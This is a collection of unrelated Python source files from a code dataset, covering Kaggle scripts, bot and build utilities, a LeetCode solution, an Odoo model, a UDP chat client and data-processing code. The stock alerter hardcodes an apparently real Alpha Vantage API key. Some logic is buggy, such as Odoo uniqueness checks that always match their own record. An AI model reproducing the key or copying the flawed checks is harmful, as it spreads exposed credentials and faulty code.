COMMENT)\n\n#==============================================================================\nutils.end(__file__)\n\nos.system(f'nohup python -u 913_predict_807-2.py {SEED} > LOG/log_913_predict_807-2_s{SEED}.py.txt &')\n\n\n","sub_path":"Kaggle/Playgroud/RiskPrediction/Home-Credit-Default-Risk-master/py/trash/912_predict_807-1.py","file_name":"912_predict_807-1.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"87468449","text":"__author__ = 'dogiko'\n\nimport random\nimport math\n\ndef dogiko_random_int(minimun, maximun, left_closed_bool, right_closed_bool): # returns an integer within the range; the last two flags define whether each end of the interval is open or closed\n    a = 0\n    b = -1\n    if minimun % 1 == 0:\n        if left_closed_bool:\n            a = minimun\n        else:\n            a = minimun + 1\n    else:\n        print(\"minimum should be integer !!\")\n\n    if maximun % 1 == 0:\n        if right_closed_bool:\n            b = maximun\n        else:\n            b = maximun - 1\n\n    else:\n        print(\"maximum should be integer !!\")\n\n    if b < a:\n        print(\"we can't pick int from empty set (maxi < mini ?)\")\n    else:\n        return random.randint(a, b)\n\n\ndef icon_combo_line_left(working_icon_id, wild_work_bool, wilds_id, icons_on_line): # for left-anchored line wins only; given the rules, returns the combo count on the specified line\n    ans = 0\n    icon_hit_on_line = []\n    for r in range(len(icons_on_line)): # determine whether each position is a hit\n        icon_hit_on_line.append(\n            (icons_on_line[r] == working_icon_id) or (wild_work_bool and (icons_on_line[r] in wilds_id)))\n\n    for r in range(len(icons_on_line)):\n        if icon_hit_on_line[r]:\n            ans += 1\n        else:\n            break\n\n    return ans\n\n\ndef icon_combo_scatter_count(working_icon_id, wild_work_bool, wilds_id, icons_appearing_on_reels): # for count-based scatters only\n    ans = 0\n    for r in range(len(icons_appearing_on_reels)): # count the occurrences shown on screen\n        for p in range(len(icons_appearing_on_reels[r])):\n            ans += ((icons_appearing_on_reels[r][p] == working_icon_id) or (\n                wild_work_bool and (icons_appearing_on_reels[r][p] in wilds_id)))\n\n    return ans\n\n\ndef confidence_level(standard_deviation, workout_mean, theoretically_mean = 0): # takes the standard deviation, the sample mean and the theoretical mean (default 0); returns the confidence level\n    error = abs(workout_mean - theoretically_mean)/standard_deviation\n    turn = 0\n    turn += error\n    
res = 0\n for i in range(10000):\n res += turn/(2*i+1)\n turn *= -(error**2)/(2*(i+1))\n\n return 2*res/math.sqrt(2*math.pi)\n","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"51316299","text":"from plugin import db_tools\n\nmongo = db_tools.use_mongo()\n\n\ndef is_participate_white(bot, update, specfic=None):\n if specfic:\n chat_id, user_id = specfic\n else:\n chat_id = update.message.chat.id\n user_id = update.message.from_user.id\n query = {'chat.id': chat_id, 'chat.white_participate': {'$in': [user_id]}}\n return bool(mongo.group.find_one(query))\n","sub_path":"plugin/is_participate_white.py","file_name":"is_participate_white.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"582399590","text":"# Copyright (c) 2013 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n\"\"\" Utilities for ChromeOS build steps. \"\"\"\n\nfrom flavor_utils.ssh_build_step_utils import SshBuildStepUtils\nfrom slave import slave_utils\nfrom py.utils import shell_utils\nimport os\n\n\nclass ChromeosBuildStepUtils(SshBuildStepUtils):\n def __init__(self, build_step_instance):\n SshBuildStepUtils.__init__(self, build_step_instance)\n self._remote_dir = '/usr/local/skiabot'\n systemtype = 'chromeos-' + self._step.args['board']\n self._build_dir = os.path.join('out', 'config', systemtype)\n\n def Compile(self, target):\n \"\"\" Compile the Skia executables. \"\"\"\n # Add gsutil to PATH\n gsutil = slave_utils.GSUtilSetup()\n os.environ['PATH'] += os.pathsep + os.path.dirname(gsutil)\n\n # Run the chromeos_make script.\n make_cmd = os.path.join('platform_tools', 'chromeos', 'bin',\n 'chromeos_make')\n cmd = [make_cmd,\n '-d', self._step.args['board'],\n target,\n 'BUILDTYPE=%s' % self._step.configuration,\n ]\n\n cmd.extend(self._step.default_make_flags)\n cmd.extend(self._step.make_flags)\n shell_utils.run(cmd)\n","sub_path":"slave/skia_slave_scripts/flavor_utils/chromeos_build_step_utils.py","file_name":"chromeos_build_step_utils.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"192734208","text":"'''\n\n480. Sliding Window Median\n\nMedian is the middle value in an ordered integer list. If the size of the list is even, there is no middle value. So the median is the mean of the two middle value.\n\nExamples:\n[2,3,4] , the median is 3\n\n[2,3], the median is (2 + 3) / 2 = 2.5\n\nGiven an array nums, there is a sliding window of size k which is moving from the very left of the array to the very right. You can only see the k numbers in the window. Each time the sliding window moves right by one position. 
Your job is to output the median array for each window in the original array.\n\nFor example,\nGiven nums = [1,3,-1,-3,5,3,6,7], and k = 3.\n\nWindow position Median\n--------------- -----\n[1 3 -1] -3 5 3 6 7 1\n 1 [3 -1 -3] 5 3 6 7 -1\n 1 3 [-1 -3 5] 3 6 7 -1\n 1 3 -1 [-3 5 3] 6 7 3\n 1 3 -1 -3 [5 3 6] 7 5\n 1 3 -1 -3 5 [3 6 7] 6\nTherefore, return the median sliding window as [1,-1,-1,3,5,6].\n\nNote:\nYou may assume k is always valid, ie: k is always smaller than input array's size for non-empty array.\nAnswers within 10^-5 of the actual value will be accepted as correct.\n\n'''\n\n# 2020/06/10, two heaps\n\n'''\nRuntime: 276 ms, faster than 51.34% of Python3 online submissions for Sliding Window Median.\nMemory Usage: 15.7 MB, less than 32.37% of Python3 online submissions for Sliding Window Median.\n'''\n\n\nclass Solution:\n def medianSlidingWindow(self, nums: List[int], k: int) -> List[float]:\n ans = []\n # min_heap: large nums\n # max_heap: small nums\n min_heap = nums[:k]\n heapq.heapify(min_heap)\n max_heap = []\n half = k // 2 + 1 if k & 1 else k // 2\n for i in range(half):\n heapq.heappush(max_heap, -heapq.heappop(min_heap))\n ans.append(self.get_median(max_heap, min_heap, k))\n del_nums = collections.defaultdict(int)\n for r in range(k, len(nums)):\n to_be_deleted = nums[r - k]\n in_num = nums[r]\n del_nums[to_be_deleted] += 1\n if in_num <= -max_heap[0]:\n heapq.heappush(max_heap, -in_num)\n if to_be_deleted > -max_heap[0]:\n self.rebalance(max_heap, min_heap)\n else:\n heapq.heappush(min_heap, in_num)\n if to_be_deleted <= -max_heap[0]:\n self.rebalance(min_heap, max_heap)\n self.check_valid(del_nums, max_heap, min_heap)\n ans.append(self.get_median(max_heap, min_heap, k))\n return ans\n\n def rebalance(self, from_heap, to_heap):\n heapq.heappush(to_heap, -heapq.heappop(from_heap))\n\n def check_valid(self, del_nums, left, right):\n while del_nums[-left[0]]:\n del_nums[-left[0]] -= 1\n heapq.heappop(left)\n while right and del_nums[right[0]]:\n del_nums[right[0]] -= 1\n heapq.heappop(right)\n\n def get_median(self, left, right, k):\n if k & 1:\n return -left[0]\n return (-left[0] + right[0]) / 2\n","sub_path":"0480. Sliding Window Median.py","file_name":"0480. 
Sliding Window Median.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"547733159","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom openerp import models, api, fields, _\r\n\r\n\r\nclass ProductTemplate(models.Model):\r\n    _inherit = 'product.template'\r\n\r\n    company_id = fields.Many2one('res.company', 'Company', default=False, help='Company that owns this product')\r\n\r\n    @api.one\r\n    @api.constrains('name')\r\n    def _check_name(self):\r\n        if self.search([('name', '=', self.name)]):\r\n            msg_error = \"The product Name must be unique.\"\r\n            raise Warning(_(msg_error))\r\n\r\n    @api.one\r\n    @api.constrains('ean13')\r\n    def _check_ean13(self):\r\n        if self.ean13:\r\n            if self.search([('ean13', '=', self.ean13)]):\r\n                msg_error = \"The product bar code must be unique.\"\r\n                raise Warning(_(msg_error))\r\n\r\n    @api.one\r\n    @api.constrains('default_code')\r\n    def _check_default_code(self):\r\n        if self.default_code:\r\n            if self.search([('default_code', '=', self.default_code)]):\r\n                msg_error = \"The product Code must be unique.\"\r\n                raise Warning(_(msg_error))\r\n\r\n\r\n    @api.model\r\n    def create(self, vals):\r\n        vals['company_id'] = False\r\n        data = super(ProductTemplate, self).create(vals)\r\n        return data\r\n\r\n    @api.multi\r\n    def write(self, vals):\r\n        vals['company_id'] = False\r\n        data = super(ProductTemplate, self).write(vals)\r\n        return data\r\n","sub_path":"purchase_multicompany/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"336460929","text":"import pandas as pd\nfrom alpha_vantage.timeseries import TimeSeries\nimport matplotlib.pyplot as plt\nimport time\n\n#LDQW7564ZBSM8GWH\nts = TimeSeries(\"LDQW7564ZBSM8GWH\", output_format=\"pandas\")\n\ntarget_price = 450\n\nwhile True:\n    data, meta_data = ts.get_intraday(symbol=\"TSLA\", interval=\"1min\", outputsize=\"full\")\n\n    closing_data = data[\"4. 
close\"]\n recent_price = closing_data[0]\n if recent_price >= target_price:\n print(\"ALERT | STOCK IS AT: \", recent_price, \" | ALERT\")\n break\n else:\n print(\"PRICE AT: \", recent_price)\n time.sleep(5)","sub_path":"src/alerter.py","file_name":"alerter.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"226028648","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 8 21:07:04 2018\r\n\r\n@author: witat\r\n\"\"\"\r\nimport pandas as pd\r\nimport lightgbm as lgb\r\nimport numpy as np\r\n\r\ntrain = pd.read_csv('C:/Users/witat/Downloads/train.csv')\r\ntest = pd.read_csv('C:/Users/witat/Downloads/test.csv')\r\n\r\nexclude_feature = ['LotFrontage', 'LotArea', 'MasVnrArea',\r\n 'BsmtFinSF1', 'BsmtFinSF2', 'BsmtUnfSF',\r\n 'TotalBsmtSF', '1stFlrSF', '2ndFlrSF',\r\n 'LowQualFinSF', 'GrLivArea', 'GarageArea',\r\n 'WoodDeckSF', 'OpenPorchSF', 'EnclosedPorch',\r\n '3SsnPorch', 'ScreenPorch', 'MiscVal']\r\n\r\noriginal = ['Id','LotFrontage', 'LotArea', 'MasVnrArea',\r\n 'BsmtFinSF1', 'BsmtFinSF2', 'BsmtUnfSF',\r\n 'TotalBsmtSF', '1stFlrSF', '2ndFlrSF',\r\n 'LowQualFinSF', 'GrLivArea', 'GarageArea',\r\n 'WoodDeckSF', 'OpenPorchSF', 'EnclosedPorch',\r\n '3SsnPorch', 'ScreenPorch', 'MiscVal']\r\n\r\ntrain_num = train[original]\r\ntest_num = test[original]\r\n\r\ntrain_num.Id = train_num.Id.astype('object')\r\ntest_num.Id = test_num.Id.astype('object')\r\n\r\ndef obj(data, test):\r\n #columns = train.select_dtypes(include=['object']).columns.values.tolist()\r\n columns = data.columns.values.tolist()\r\n columns = columns[1:-1]\r\n \r\n \r\n for column in columns:\r\n data[column] = data[column].fillna('NA')\r\n data[column] = data[column].astype('object')\r\n \r\n test[column] = test[column].fillna('NA')\r\n test[column] = test[column].astype('object')\r\n \r\n x = data.groupby(column).agg({'SalePrice': np.mean})\r\n x.columns = [column + '_mean']\r\n x = x.reset_index()\r\n \r\n x[column] = x[column].astype('object')\r\n data = data.merge(x, on = column, how = 'left')\r\n data = data.drop(columns = [column])\r\n \r\n test = test.merge(x, on = column, how = 'left')\r\n test = test.drop(columns = [column])\r\n \r\n return data, test\r\n\r\ntrain_transform, test_transform = obj(train.drop(columns = exclude_feature),test.drop(columns = exclude_feature))\r\n\r\ntrain_transform.Id = train_transform.Id.astype('object')\r\ntest_transform.Id = test_transform.Id.astype('object')\r\n\r\ntrain = train_num.merge(train_transform, on = 'Id', how = 'left')\r\ntest = test_num.merge(test_transform, on = 'Id', how = 'left')\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Kaggle.py","file_name":"Kaggle.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"558860836","text":"'''\nGetting weights + variations for L1 Prefiring, based on:\nhttps://lathomas.web.cern.ch/lathomas/TSGStuff/L1Prefiring/PrefiringMaps_2016and2017/\nCMSSW Producer can be found in:\nhttps://github.com/cms-sw/cmssw/blob/793d75e56fbb6ab0e04069498f91f261c98e1a52/PhysicsTools/PatUtils/plugins/L1ECALPrefiringWeightProducer.cc\nTwiki page:\nhttps://twiki.cern.ch/twiki/bin/viewauth/CMS/L1ECALPrefiringWeightRecipe\n'''\n\nimport os\nimport math\nfrom Analysis.Tools.helpers import getObjFromFile, deltaR\n\nclass L1PrefireWeight:\n def __init__(self, year, syst=0.2):\n if year == 2016:\n self.phEff = 
getObjFromFile(os.path.expandvars('$CMSSW_BASE/src/Analysis/Tools/data/L1Prefiring/L1prefiring_photonpt_2016BtoH.root'), 'L1prefiring_photonpt_2016BtoH')\n self.jetEff = getObjFromFile(os.path.expandvars('$CMSSW_BASE/src/Analysis/Tools/data/L1Prefiring/L1prefiring_jetpt_2016BtoH.root'), 'L1prefiring_jetpt_2016BtoH')\n elif year == 2017:\n self.phEff = getObjFromFile(os.path.expandvars('$CMSSW_BASE/src/Analysis/Tools/data/L1Prefiring/L1prefiring_photonpt_2017BtoF.root'), 'L1prefiring_photonpt_2017BtoF')\n self.jetEff = getObjFromFile(os.path.expandvars('$CMSSW_BASE/src/Analysis/Tools/data/L1Prefiring/L1prefiring_jetpt_2017BtoF.root'), 'L1prefiring_jetpt_2017BtoF')\n else:\n self.phEff = None\n self.jetEff = None\n\n if self.phEff:\n self.maxPtG = self.phEff.GetYaxis().GetXmax()\n self.maxPtJ = self.jetEff.GetYaxis().GetXmax()\n self.rel_syst = syst\n\n def getWeight(self, photons, jets):\n weight = 1.\n weightUp = 1.\n weightDown = 1.\n overlapIndices = []\n\n for jet in jets:\n if not 2.0 <= abs(jet['eta']) <= 3.0:\n continue\n \n pt_j = jet['pt'] if jet['pt'] < self.maxPtJ else self.maxPtJ - 1.\n if pt_j < 20: continue\n cleanJet = True\n\n # get overlap with photons\n for i,photon in enumerate(photons):\n if deltaR(photon, jet)<0.4:\n cleanJet = False\n overlapIndices.append(i)\n pt_g = photon['pt'] if photon['pt'] < self.maxPtG else self.maxPtG - 1.\n prefRatePh = self.phEff.GetBinContent(self.phEff.GetXaxis().FindBin(photon['eta']), self.phEff.GetYaxis().FindBin(pt_g))\n prefRatePh_stat = self.phEff.GetBinError(self.phEff.GetXaxis().FindBin(photon['eta']), self.phEff.GetYaxis().FindBin(pt_g))\n prefRateJet = self.jetEff.GetBinContent(self.jetEff.GetXaxis().FindBin(jet['eta']), self.jetEff.GetYaxis().FindBin(pt_j))\n prefRateJet_stat = self.jetEff.GetBinError(self.jetEff.GetXaxis().FindBin(jet['eta']), self.jetEff.GetYaxis().FindBin(pt_j))\n\n if prefRatePh > prefRateJet:\n prefRate = prefRatePh\n prefRate_stat = prefRatePh_stat\n else:\n prefRate = prefRateJet\n prefRate_stat = prefRateJet_stat\n\n if cleanJet:\n prefRate = self.jetEff.GetBinContent(self.jetEff.GetXaxis().FindBin(jet['eta']), self.jetEff.GetYaxis().FindBin(pt_j))\n prefRate_stat = self.jetEff.GetBinError(self.jetEff.GetXaxis().FindBin(jet['eta']), self.jetEff.GetYaxis().FindBin(pt_j))\n\n weight *= (1 - prefRate)\n weightUp *= (1 - min(1, prefRate + math.sqrt(prefRate_stat**2 + (self.rel_syst * prefRate)**2) ) )\n weightDown *= (1 - max(0, prefRate - math.sqrt(prefRate_stat**2 + (self.rel_syst * prefRate)**2) ) )\n\n\n for i, photon in enumerate(photons):\n if i not in overlapIndices:\n pt_g = photon['pt'] if photon['pt'] < self.maxPtG else self.maxPtG - 1.\n if pt_g < 20: continue\n prefRatePh = self.phEff.GetBinContent(self.phEff.GetXaxis().FindBin(photon['eta']), self.phEff.GetYaxis().FindBin(pt_g))\n prefRatePh_stat = self.phEff.GetBinError(self.phEff.GetXaxis().FindBin(photon['eta']), self.phEff.GetYaxis().FindBin(pt_g))\n \n weight *= (1 - prefRatePh )\n weightUp *= (1 - min(1, prefRatePh + math.sqrt(prefRatePh_stat**2 + (self.rel_syst * prefRatePh)**2) ) )\n weightDown *= (1 - max(0, prefRatePh - math.sqrt(prefRatePh_stat**2 + (self.rel_syst * prefRatePh)**2) ) )\n\n return weight, weightUp, weightDown\n\n","sub_path":"Tools/python/L1PrefireWeight.py","file_name":"L1PrefireWeight.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"485968969","text":"import socket\nimport threading\n\n\ndef read_sock():\n while 
True:\n data = sock.recv(1024)\n print(data.decode('utf-8'))\n\n\nserver = ('192.168.31.242', 5050)\nalias = input(\"Your username: \")\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.bind(('', 0))\nsock.sendto((alias + \" Connect to server\").encode('utf-8'), server)\n\npotik = threading.Thread(target=read_sock)\npotik.start()\n\nwhile True:\n message = input(\"Your message: \")\n sock.sendto(('[' + alias + '] ' + message).encode('utf-8'), server)\n","sub_path":"lectures/threads/messanger/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"322796871","text":"import argparse\nimport sys\nfrom process_info import ProcessInfo\nfrom process_monitor_config import ProcessMonitorConfig\n\n\n# Implements command line Monitor methods\nclass Monitor:\n\n # Parse command line arguments\n def parse_args(self, v_args):\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument(\n '--config',\n required=True\n )\n return parser.parse_args(v_args)\n\n def run(self, v_args):\n args = self.parse_args(v_args)\n\n pmc = ProcessMonitorConfig(filename=args.config)\n pi = ProcessInfo()\n\n for v in pmc.process_list:\n pi.validate_process_exists(v)\n\n pi = ProcessInfo() # Reset pi to get a new set of processes\n process_status = pi.validate_number_processes(pmc)\n\n # print process_status['message']\n sys.exit(process_status['exit_code'])\n","sub_path":"dynamic_process_monitor/lib/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"408198004","text":"#indirect recursion\n\ni = 1\ndef disp():\n\tglobal i\n\tprint(\"hello\")\n\ti = i + 1\n\t\n\tif(i<=5):\n\t\tshow()\n\t\treturn\n\tprint(\"bye from disp\")\n\t\ndef show():\n\tglobal i\n\tprint(\"hi\")\n\ti = i + 1\n\t\n\tif(i<=5):\n\t\tdisp()\n\t\t\nprint(\"before recursion\")\n#show()\ndisp()\nprint(\"after recursion\")\n'''\nhello(2) \thi(3)\t hello(4) \t hi(5)\t\thello(6)bye from disp\ndisp() <==> show() <==> disp() <==> show() <==> disp()\n'''","sub_path":"Recursion/rec_in7.py","file_name":"rec_in7.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"149618652","text":"import pandas as pd\nfrom copy import deepcopy\n\ndef get_ms(frame, kda, items, tower, dragon):\n column_p = ['gameid', 'minute', 'kills', 'deaths', 'assists', 'level', 'items', 'gold', 'cs']\n minute_p_df = pd.DataFrame(index=[i for i in range(len(frame)-1)], columns=column_p)\n \n minute_p_df['minute'] = [i for i in range(1,len(frame))]\n minute_p_df['kills'] = kda['kills']\n minute_p_df['deaths'] = kda['deaths']\n minute_p_df['assists'] = kda['assists']\n \n if len(frame)-1 > len(items):\n for _ in range(len(frame)-1-len(items)):\n items.append(items[-1])\n elif len(frame)-1 < len(items):\n items = items[:len(frame)-1]\n minute_p_df['items'] = items\n \n level, gold, cs = [], [], []\n for i in range(len(frame)):\n minute_data = pd.DataFrame(frame.iloc[i].values(), index=frame.iloc[i].keys()).sort_values('participantId')\n level.append(minute_data['level'].values.tolist())\n gold.append(minute_data['totalGold'].values.tolist())\n cs.append((minute_data['minionsKilled']+minute_data['jungleMinionsKilled']).values.tolist())\n minute_p_df['level'] = level[1:]\n minute_p_df['gold'] = gold[1:]\n minute_p_df['cs'] = 
cs[1:]\n    \n    \n    \n    column_t = ['gameid', 'minute', 'golds', 'kills', 'towers', 'dragons']\n    minute_t_df = pd.DataFrame(index=[i for i in range(len(frame)-1)], columns=column_t)\n    minute_t_df['minute'] = [i for i in range(1,len(frame))]\n    \n    gold_blue = [sum(golds[:5]) for golds in minute_p_df['gold'].tolist()]\n    gold_red = [sum(golds[5:]) for golds in minute_p_df['gold'].tolist()]\n    minute_t_df['golds'] = [[gold_blue[i],gold_red[i]] for i in range(len(frame)-1)]\n    \n    kill_blue = [sum(kills[:5]) for kills in kda['kills']]\n    kill_red = [sum(kills[5:]) for kills in kda['kills']]\n    minute_t_df['kills'] = [[kill_blue[i],kill_red[i]] for i in range(len(frame)-1)]\n    \n    towers = [0, 0]\n    towers_m = []\n    for i in range(len(tower)):\n        event = tower.iloc[i]\n        if event['building'][0] == 'T':\n            time = event['tstamp']//60000 + 1\n            if len(towers_m) < time:\n                for _ in range(time-1-len(towers_m)):\n                    towers_m.append(deepcopy(towers))\n            if event['team'] == 'RED': towers[0] += 1\n            else: towers[1] += 1\n    for _ in range(len(frame)-1-len(towers_m)):\n        towers_m.append(deepcopy(towers))\n    minute_t_df['towers'] = towers_m\n    \n    dragons = [['_'], ['_']]\n    dragons_m = []\n    dragon_count, spirit = 0, None\n    for i in range(len(dragon)):\n        event = dragon.iloc[i]\n        if event['monster'][0] == 'D':\n            time = event['tstamp']//60000 + 1\n            if len(dragons_m) < time:\n                for _ in range(time-1-len(dragons_m)):\n                    dragons_m.append(deepcopy(dragons))\n            if event['team'] == 'BLUE': \n                if dragons[0][0] == '_': dragons[0][0] = event['monster'].split('_')[1]\n                else : dragons[0].append(event['monster'].split('_')[1])\n            else:\n                if dragons[1][0] == '_': dragons[1][0] = event['monster'].split('_')[1]\n                else: dragons[1].append(event['monster'].split('_')[1])\n    for _ in range(len(frame)-1-len(dragons_m)):\n        dragons_m.append(deepcopy(dragons))\n    \n    for i in range(len(dragons_m)):\n        if len(dragons_m[i][0]) > len(dragons_m[i][1]):\n            for _ in range(len(dragons_m[i][0])-len(dragons_m[i][1])):\n                dragons_m[i][1].append('_')\n        elif len(dragons_m[i][0]) < len(dragons_m[i][1]):\n            for _ in range(len(dragons_m[i][1])-len(dragons_m[i][0])):\n                dragons_m[i][0].append('_')\n    \n    minute_t_df['dragons'] = dragons_m\n    \n    \n    return minute_p_df, minute_t_df\n","sub_path":"v4/make_minute.py","file_name":"make_minute.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"219222870","text":"from time import sleep  # Import this shitty library\r\n# Creating a class called Cars\r\n\r\nclass Cars:\r\n    \"\"\" The main car class \"\"\"\r\n\r\n    def __init__(self,name,speed,fuel):\r\n        print(\"Getting Data! \")\r\n        self.name = name\r\n        self.speed = speed\r\n        self.fuel = fuel\r\n\r\n        if type(self.name) != str or self.name == \"\":\r\n            print(\"You didn't write a name! \")\r\n            input(\"Press any key to exit \")\r\n            exit()\r\n        else:\r\n            pass\r\n\r\n    \r\n    def increment(self,count):\r\n        \"\"\" increment method \"\"\"\r\n        print(\"Incrementing the speed... \")\r\n        sleep(3)\r\n        while self.speed < count:\r\n            self.speed = self.speed + 5\r\n            if self.speed == count:\r\n                print(\"The speed is good according to what you want!\")\r\n                print(self.speed)\r\n                break #Stop the loop\r\n            else:\r\n                continue #Continue the loop :) until it gets the correct value \r\n\r\n    \r\n    def decrement(self,count):\r\n        \"\"\" decrement method \"\"\"\r\n        print(\"Decrementing the speed... 
\")\n sleep(3)\n while self.speed > count:\n self.speed = self.speed - 5\n if self.speed == count:\n print(\"The value of speed as you want!\")\n print(self.speed)\n break\n else:\n continue\n\n\n#Attributes\nuser_car = Cars(\"Dacia\",210,1)\nuser_car.increment(270)\n","sub_path":"source-code.py","file_name":"source-code.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"470155270","text":"import time\nimport threading\nimport os\nimport cv2 as cv\n\nimport pickle as pkl\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport pandas as pd\nfrom tqdm import tqdm\n# from utilities.utility import get_datetime_attrs\nfrom matplotlib.patches import Rectangle\n\nfrom utilities.utility import load_catalog\nfrom utilities.utility import read_ncdf\nfrom utilities.utility import read_hdf5\nfrom utilities.utility import map_coord_to_pixel\nfrom utilities.utility import fetch_channel_samples\nfrom utilities.utility import plot_and_save_image\nfrom utilities.config import init_args\nfrom utilities.config import CROP_SIZE\nfrom utilities.utility import *\n\n# loads dataset and iterates over dataframe rows as well as hdf5 and nc\n# files for processing\n\n\ndef load_dataset(args):\n catalog = load_catalog(args.data_catalog_path)\n for index, row in catalog.iterrows():\n ncdf_path = row['ncdf_path']\n hdf5_8 = row['hdf5_8bit_path']\n hdf5_16 = row['hdf5_16bit_path']\n # if .nc doesn't exist, then skip example\n if row['ncdf_path'] == \"nan\":\n continue\n ncdf_data = read_ncdf(ncdf_path)\n h5_data = read_hdf5(hdf5_16)\n\n # print(ncdf_data.dimensions)\n # print(ncdf_data.variables.keys())\n # print(ncdf_data.ncattrs)\n\n # extracts meta-data to map station co-ordinates to pixels\n lat_min = ncdf_data.attrs['geospatial_lat_min'][0]\n lat_max = ncdf_data.attrs['geospatial_lat_max'][0]\n lon_min = ncdf_data.attrs['geospatial_lon_min'][0]\n lon_max = ncdf_data.attrs['geospatial_lon_max'][0]\n lat_res = ncdf_data.attrs['geospatial_lat_resolution'][0]\n lon_res = ncdf_data.attrs['geospatial_lon_resolution'][0]\n\n station_coords = []\n for sta, (lat, lon, elev) in args.station_data.items():\n # y = row data (longitude: changes across rows i.e. vertically)\n # x = column data (latitude: changes across columns i.e\n # horizontally)\n x, y = [\n map_coord_to_pixel(\n lat, lat_min, lat_res), map_coord_to_pixel(\n lon, lon_min, lon_res)]\n station_coords.append([y, x])\n station_coords = np.array(station_coords)\n\n # reads h5 and ncdf samples\n h5_16bit_samples = fetch_channel_samples(\n args, h5_data, row['hdf5_16bit_offset'])\n ncdf_samples = [ncdf_data.variables[ch][0] for ch in args.channels]\n\n plot_and_save_image(\n args,\n station_coords,\n h5_16bit_samples,\n prefix=\"h5_16\")\n plot_and_save_image(args, station_coords, ncdf_samples, prefix=\"ncdf\")\n break\n\n\n# pre process dataset to remove common nans in dataframe\ndef pre_process(dataset):\n # no night time data\n pp_dataset = dataset[(dataset.BND_DAYTIME == 1) | (dataset.TBL_DAYTIME == 1) | (dataset.DRA_DAYTIME == 1) | (\n dataset.FPK_DAYTIME == 1) | (dataset.GWN_DAYTIME == 1) | (dataset.PSU_DAYTIME == 1) | (dataset.SXF_DAYTIME == 1)]\n\n # no empty path images\n pp_dataset = pp_dataset[pp_dataset.ncdf_path != \"nan\"]\n\n # make iso_datetime a column instead of index\n pp_dataset = pp_dataset.reset_index()\n\n # shuffle all rows of dataset\n # !!! 
REMOVE FOR CONSIDERING TIME SEQUENCING ###\n # pp_dataset = pp_dataset.sample(frac=1).reset_index(drop=True)\n # pp_dataset = pp_dataset.reset_index(drop=True)\n\n return pp_dataset\n\n\ndef station_from_row(args, rows):\n x = []\n y = []\n # R! vectorize this by using iloc instead of iterrows?\n for _, row in rows.iterrows():\n ncdf_path = row['ncdf_path']\n hdf5_8 = row['hdf5_8bit_path']\n hdf5_16 = row['hdf5_16bit_path']\n # if .nc doesn't exist, then skip example\n if row['ncdf_path'] == \"nan\":\n continue\n\n if args.image_data == 'hdf5v7_8bit':\n data_handle = read_hdf5(hdf5_8)\n idx = row['hdf5_8bit_offset']\n samples = fetch_channel_samples(args, data_handle, idx)\n elif args.image_data == 'hdf5v5_16bit':\n data_handle = read_hdf5(hdf5_16)\n idx = row['hdf5_16bit_offset']\n samples = fetch_channel_samples(args, data_handle, idx)\n elif args.image_data == 'netcdf':\n data_handle = read_ncdf(ncdf_path)\n samples = [data_handle.variables[ch][0] for ch in args.channels]\n\n # extracts meta-data to map station co-ordinates to pixels\n station_coords = {}\n if args.image_data == 'hdf5v7_8bit' or args.image_data == 'hdf5v5_16bit':\n lats, lons = utils.fetch_hdf5_sample(\n \"lat\", data_handle, idx), utils.fetch_hdf5_sample(\n \"lon\", data_handle, idx)\n for sta, (lat, lon, elev) in args.station_data.items():\n # y = row data (longitude: changes across rows i.e. vertically)\n # x = column data (latitude: changes across columns i.e\n # horizontally)\n x_coord, y_coord = [\n np.argmin(np.abs(lats - lat)), np.argmin(np.abs(lons - lon))]\n station_coords[sta] = [y_coord, x_coord]\n # print(x_coord,y_coord)\n else:\n lat_min = data_handle.attrs['geospatial_lat_min'][0]\n lat_max = data_handle.attrs['geospatial_lat_max'][0]\n lon_min = data_handle.attrs['geospatial_lon_min'][0]\n lon_max = data_handle.attrs['geospatial_lon_max'][0]\n lat_res = data_handle.attrs['geospatial_lat_resolution'][0]\n lon_res = data_handle.attrs['geospatial_lon_resolution'][0]\n\n for sta, (lat, lon, elev) in args.station_data.items():\n # y = row data (longitude: changes across rows i.e. vertically)\n # x = column data (latitude: changes across columns i.e\n # horizontally)\n 